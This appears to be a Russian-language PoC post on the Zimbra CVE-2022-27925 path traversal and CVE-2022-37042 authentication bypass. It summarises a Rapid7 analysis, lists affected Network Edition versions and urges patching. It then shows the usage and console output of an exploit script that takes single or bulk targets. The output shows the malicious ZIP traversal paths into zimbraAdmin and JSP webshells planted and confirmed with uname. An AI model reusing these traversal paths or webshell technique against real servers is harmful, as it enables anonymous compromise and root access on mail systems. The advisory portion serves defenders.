
PoC
10 мая 2022 года Zimbra выпустила версии 9.0.0 patch 24 и 8.8.15 patch 31 для устранения множества уязвимостей в Zimbra Collaboration Suite, включая CVE-2022-27924 (о котором мы писали ранее) и CVE-2022-27925.
Изначально Zimbra назвала CVE-2022-27925 аутентифицированной атакой path traversal, при которой административный пользователь мог записывать файлы в любую директорию файловой системы от имени учетной записи Zimbra. Поскольку изначально считалось, что это атака только для администраторов, NVD присвоила ей базовую оценку CVSS 7.8. Позже Volexity заметила, что злоумышленники, эксплуатирующие эту уязвимость, нашли способ обойти административные требования, и написала об этом 10 августа 2022 года. Этот новый обход аутентификации получил новый идентификатор – CVE-2022-37042.
Объединив исходную уязвимость path traversal и новый обход аутентификации, злоумышленники могут удаленно скомпрометировать систему Zimbra Collaboration Suite через административный порт (по умолчанию 7071) анонимно. В сочетании с недавно неисправленной уязвимостью повышения привилегий, о которой мы недавно писали и написали эксплойт, эти три уязвимости приводят к удаленному выполнению команд от имени пользователя root на незапатченных системах.
Хотя публичные уведомления не упоминают об этом, согласно нашему анализу, Zimbra Collaboration Suite Network Edition (платная версия) уязвима, а Open Source Edition (бесплатная) — нет (поскольку в ней нет уязвимой конечной точки mboximport). Уязвимые версии:
Zimbra Collaboration Suite Network Edition 9.0.0 Patch 23 (и более ранние)
Zimbra Collaboration Suite Network Edition 8.8.15 Patch 30 (и более ранние)
Эти уязвимости (и другие в Zimbra) активно эксплуатируются в дикой природе, поэтому их следует исправить или отключить как можно скорее. Если вы подозреваете, что были скомпрометированы, Zimbra предоставляет шаги по восстановлению вашего сервера Zimbra Collaboration Suite с нуля на последнем патче без потери данных.
Источник: https://attackerkb.com/topics/dSu4KGZiFd/cve-2022-27925/rapid7-analysis
_____ _ __
/__ / (_)___ ___ / /_ _________ _
/ / / / __ `__ \/ __ \/ ___/ __ `/
/ /__/ / / / / / / /_/ / / / /_/ /
/____/_/_/ /_/ /_/_.___/_/ \__,_/
CVE-2022-27925
usage: exploit.py [-h] [-t TARGET] [-l LIST]
options:
-h, --help show this help message and exit
-t TARGET, --target TARGET
URl with protocol HTTPS
-l LIST, --list LIST List of targets
root@root# python exploit.py -t zimbra.example.com
_____ _ __
/__ / (_)___ ___ / /_ _________ _
/ / / / __ `__ \/ __ \/ ___/ __ `/
/ /__/ / / / / / / /_/ / / / /_/ /
/____/_/_/ /_/ /_/_.___/_/ \__,_/
CVE-2022-27925 Sanan Qasim
[!] Testing URL: https://zimbra.example.com
[!] Target is up!
[!] Creating malicious ZIP path: ../../../../mailboxd/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[+] Webshell works!!
[+] WebShell location: https://zimbra.example.com/zimbraAdmin/BQOQBN.jsp
[+] Uname -a output: Linux zimbra.docker 3.10.0-1127.8.2.el7.x86_64 #1 SMP Thu May 7 19:30:37 EDT 2020 x86_64 x86_64 x86_64 GNU/Linux
root@root# python exploit.py -l targets.txt
_____ _ __
/__ / (_)___ ___ / /_ _________ _
/ / / / __ `__ \/ __ \/ ___/ __ `/
/ /__/ / / / / / / /_/ / / / /_/ /
/____/_/_/ /_/ /_/_.___/_/ \__,_/
CVE-2022-27925 sanan Qasim
[!] Testing URL: https://patched.example.com
[!] Target is up!
[!] Creating malicious ZIP path: ../../../../mailboxd/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[-] Target not vulnerable
[!] Creating malicious ZIP path: ../../../../jetty_base/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[-] Target not vulnerable
[!] Creating malicious ZIP path: ../../../../jetty/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[-] Target not vulnerable
[!] Testing URL: https://zimbra.example.com
[!] Target is up!
[!] Creating malicious ZIP path: ../../../../mailboxd/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[+] Webshell works!!
[+] WebShell location: https://zimbra.example.com/zimbraAdmin/7RRT4G.jsp
[+] Uname -a output: Linux zimbra.docker 3.10.0-1127.8.2.el7.x86_64 #1 SMP Thu May 7 19:30:37 EDT 2020 x86_64 x86_64 x86_64 GNU/Linux
[!] Creating malicious ZIP path: ../../../../jetty_base/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[+] Webshell works!!
[+] WebShell location: https://zimbra.example.com/zimbraAdmin/7RRT4G.jsp
[+] Uname -a output: Linux zimbra.docker 3.10.0-1127.8.2.el7.x86_64 #1 SMP Thu May 7 19:30:37 EDT 2020 x86_64 x86_64 x86_64 GNU/Linux
[!] Creating malicious ZIP path: ../../../../jetty/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[+] Webshell works!!
[+] WebShell location: https://zimbra.example.com/zimbraAdmin/7RRT4G.jsp
[+] Uname -a output: Linux zimbra.docker 3.10.0-1127.8.2.el7.x86_64 #1 SMP Thu May 7 19:30:37 EDT 2020 x86_64 x86_64 x86_64 GNU/Linux
[!] Testing URL: https://patched.example.com
[!] Target is up!
[!] Creating malicious ZIP path: ../../../../mailboxd/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[-] Target not vulnerable
[!] Creating malicious ZIP path: ../../../../jetty_base/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[-] Target not vulnerable
[!] Creating malicious ZIP path: ../../../../jetty/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[-] Target not vulnerable